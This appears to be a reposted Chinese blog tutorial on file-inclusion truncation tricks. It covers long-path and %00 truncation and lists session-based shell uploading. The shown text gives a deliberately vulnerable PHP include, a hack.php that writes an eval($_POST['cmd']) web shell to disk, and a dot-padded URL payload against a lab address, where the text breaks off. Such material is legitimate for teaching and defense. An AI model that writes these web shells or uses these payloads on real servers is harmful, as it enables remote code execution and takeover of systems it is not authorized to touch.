本文转自行云博客https://www.xy586.top/
文章目录
前期准备
长目录截断
原理
payload
%00截断
原理
payload
基于session机制传马
条件:
payload
总结
前期准备
file.php代码
$a = $_GET['a'];
include($a.'.html');
?>
hack.php代码
fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>');
?>
长目录截断
原理
在windows下目录最大长度为256字节,linux下为4096字节,其后面超出部分被丢弃。
正常访问
payload
使用.绕过
http://192.168.232.128/file.php?a=hack.php........................................................................................................................